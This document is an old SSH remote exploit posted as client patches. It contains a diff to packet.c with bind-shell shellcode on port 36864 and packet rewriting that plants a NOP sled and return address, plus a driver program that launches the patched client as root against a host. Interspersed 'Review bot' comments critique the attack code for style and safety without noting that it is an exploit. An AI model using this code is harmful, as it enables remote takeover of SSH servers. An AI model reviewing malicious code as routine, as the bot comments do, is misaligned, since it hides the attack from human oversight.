# Exploit code in the form of ssh client patches by Hugo Dias < bsphere@clix.pt >. - --- packet.c Sat Oct 14 06:23:12 2000 +++ packet.c Tue Feb 20 09:33:00 2001 
@@ -68,6 +68,85 @@ #define DBG(x) #endif + +/* + * Linux/x86 + * TCP/36864 portshell (old, could be optimized further) + */ + +char shellcode[] = /* anathema */ +/* main: */ +"\xeb\x72" /* jmp callz */ +/* start: */ +"\x5e" /* popl %esi */ + + /* socket() */ +"\x29\xc0" /* subl %eax, %eax */ +"\x89\x46\x10" /* movl %eax, 0x10(%esi) */ +"\x40" /* incl %eax */ +"\x89\xc3" /* movl %eax, %ebx */ +"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ +"\x40" /* incl %eax */ +"\x89\x46\x08" /* movl %eax, 0x08(%esi) */ +"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* bind() */ +"\x43" /* incl %ebx */ +"\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ +"\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ +"\x88\x46\x08" /* movb %al, 0x08(%esi) */ +"\x29\xc0" /* subl %eax, %eax */ +"\x89\xc2" /* movl %eax, %edx */ +"\x89\x46\x18" /* movl %eax, 0x18(%esi) */ +"\xb0\x90" /* movb $0x90, %al */ +"\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ +"\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ +"\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ +"\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* listen() */ +"\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ +"\x43" /* incl %ebx */ +"\x43" /* incl %ebx */ +"\xb0\x66" /* movb $0x66, %al */ +"\xcd\x80" /* int $0x80 */ + + /* accept() */ +"\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ +"\x89\x56\x10" /* movl %edx, 0x10(%esi) */ +"\xb0\x66" /* movb $0x66, %al */ +"\x43" /* incl %ebx */ +"\xcd\x80" /* int $0x80 */ + + /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */ +"\x86\xc3" /* xchgb %al, %bl */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x29\xc9" /* subl %ecx, %ecx */ +"\xcd\x80" /* int $0x80 */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x41" /* incl %ecx */ +"\xcd\x80" /* int $0x80 */ +"\xb0\x3f" /* movb $0x3f, %al */ +"\x41" /* incl %ecx */ +"\xcd\x80" /* int $0x80 */ + + /* execve() */ +"\x88\x56\x07" /* movb %dl, 0x07(%esi) */ +"\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ 
+"\x87\xf3" /* xchgl %esi, %ebx */ +"\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ +"\xb0\x0b" /* movb $0x0b, %al */ +"\xcd\x80" /* int $0x80 */ + +/* callz: */ +"\xe8\x89\xff\xff\xff" /* call start */ +"/bin/sh"; + + /* * This variable contains the file descriptors used for communicating with * the other side. connection_in is used for reading; connection_out for @@ -125,6 +204,9 @@ /* Session key information for Encryption and MAC */ Kex *kex = NULL; +/* Packet Number */ +int count = 0; + void packet_set_kex(Kex *k) { @@ -461,6 +543,8 @@ unsigned int checksum; u_int32_t rand = 0; + count++; + /* * If using packet compression, compress the payload of the outgoing * packet. @@ -1172,7 +1256,64 @@ void packet_write_poll() { - - int len = buffer_len(&output); + int len; + char buf[50],*p,*ptr; + char code[270000]; + long sz; + FILE *f; + + if (count == 2) + { + f = fopen("/tmp/code","r"); + fgets(buf,28,f); + fclose(f); + + sz = GET_32BIT(&buf[24]); + buffer_clear(&output); + buffer_append(&output,code,sz); + + len = buffer_len(&output); + + ptr = buffer_ptr(&output); + + for(p = ptr + 4 ; p < ptr + GET_32BIT(&buf[16]) ; p+=8) + { + *p=buf[0]; + *(p+1)=buf[1]; + *(p+2)=buf[2]; + *(p+3)=buf[3]; + *(p+4)=buf[4]; + *(p+5)=buf[5]; + *(p+6)=buf[6]; + *(p+7)=buf[7]; + } + + sz = ((GET_32BIT(&buf[20]) + 8) & ~7); + + for(p = p ; p < ptr + sz ; p+=8) + { + *p=buf[8]; + *(p+1)=buf[9]; + *(p+2)=buf[10]; + *(p+3)=buf[11]; + *(p+4)=buf[12]; + *(p+5)=buf[13]; + *(p+6)=buf[14]; + *(p+7)=buf[15]; + } + + sz = len - GET_32BIT(&buf[20]); + + memset(p,'\x90',sz); + memcpy(p+sz-strlen(shellcode)-16,&shellcode,strlen(shellcode)); + memcpy(ptr,&buf[20],4); + + count++; + } + + len = buffer_len(&output); + + if (len > 0) { len = write(connection_out, buffer_ptr(&output), len); if (len <= 0) { 
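Review bot: `char shellcode[]` is introduced as a writable, external-linkage global in packet.c with nothing at the definition tying it to its only consumer, the `memcpy` in `packet_write_poll` (the hunk at +1256); `static const char shellcode[] =` would confine the symbol to this translation unit and let the compiler place the bytes in read-only storage. The header comment should also say how the length is determined, because the consumer sizes the copy with `strlen(shellcode)`, for example `/* consumed by packet_write_poll(); sized there with strlen(), so the trailing "/bin/sh" counts toward the copied length */`. The comment block above the array describes the bytes as a port shell but never mentions that the array is only ever read, which is the fact a maintainer needs before touching either end.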
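Review bot: The comment `/* Packet Number */` on `int count = 0;` understates what the variable does: it is incremented once per outgoing packet in the hunk at +543 (the owning function's name lies outside that hunk) and is then used in `packet_write_poll` (the hunk at +1256) both as a trigger, `if (count == 2)`, and as a one-shot latch, since the branch does `count++` so the rewrite cannot fire a second time. A comment such as `/* Outgoing-packet counter; packet_write_poll() acts once when it reaches 2 and bumps it past 2 so it never retriggers */` records that coupling where the variable is declared. It is also a generic name at file scope without `static`; `static int count = 0;` avoids colliding with any other `count` symbol at link time. The same note covers the `count++` hunk at +543.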
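Review bot: `f = fopen("/tmp/code","r")` is handed straight to `fgets` without a NULL check, so a missing or unreadable file dereferences a null `FILE *` rather than failing cleanly; `if (!f) return;` before the `fgets`, or skipping the whole branch, is the minimal guard. `code[270000]` is a 270 KB automatic array that is never written before `buffer_append(&output, code, sz)` copies `sz` bytes of it, and `sz` comes from the file via `GET_32BIT(&buf[24])` with no bound against `sizeof code`, so an oversized value reads past the array and the copied bytes are uninitialized stack contents. `buf[50]` is likewise uninitialized, and `fgets(buf,28,f)` stores at most 27 bytes plus a terminator, so the `GET_32BIT` reads at `&buf[16]`, `&buf[20]` and `&buf[24]` can cover bytes the file never supplied. `for(p = p ; ...)` is a self-assignment that reads as a typo; `for( ; p < ptr + sz ; p+=8)` says what is meant. The function's tail (the `write` loop after `if (len > 0)`) continues past the hunk.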
@@ -1299,3 +1440,4 @@ max_packet_size = s; return s; } + - ------------------------------------------------------------------------------------ /* THIS FILE IS FOR EDUCATIONAL PURPOSE ONLY. BlackSphere - Hugo Oliveira Dias Tue Feb 20 16:18:00 2001 Email: bsphere@clix.pt Homepage: http://planeta.clix.pt/bsphere Exploit code for using the modified ssh */ #include #include #include #include #include #include /* Path to modified ssh */ #define PATH_SSH "./ssh" int main(int argc,char *argv[]) { int f; int port; unsigned long addr,*ptr; char *buffer,*aux,ch,*ssh; int i; if (argc < 8) { printf("\nUsage : %s \ \n\n",argv[0]); fflush(stdout); _exit(0); } port=atoi(argv[6]); buffer = (char *) malloc(29); ptr = (unsigned long *) buffer; *(ptr++) = 1543007393 + strtoul(argv[1],0,10); *(ptr++) = 0; *(ptr++) = strtoul(argv[7],0,10); *(ptr++) = 0; *(ptr++) = 16520 + strtoul(argv[2],0,10); *(ptr++) = strtoul(argv[3],0,10); *(ptr++) = strtoul(argv[4],0,10); buffer[29]=0; for(i = 0 ; i < 27 ; i+=4) { aux = buffer + i; ch=*aux; *aux=*(aux+3); *(aux+3)=ch; ch=*(aux+1); *(aux+1)=*(aux+2); *(aux+2)=ch; } printf("\nSaved Eip : &h + %u",1543007393 + strtoul(argv[1],0,10)); printf("\nReturn Address : 0x%xxxxx",(16520+strtoul(argv[2],0,10))/8); printf("\nPacket Length : %u",(strtoul(argv[3],0,10)+8) & ~7); printf("\nUsername Length : %u\n\n",strtoul(argv[4],0,10)); fflush(stdout); f = open("/tmp/code",O_RDWR | O_CREAT,S_IRWXU); write(f,buffer,28); close(f); ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5])); strcpy(ssh,PATH_SSH); sprintf(ssh+strlen(PATH_SSH)," -p %i -v -l root %s",port,argv[5]); printf("%s\n",ssh); system(ssh); _exit(0); }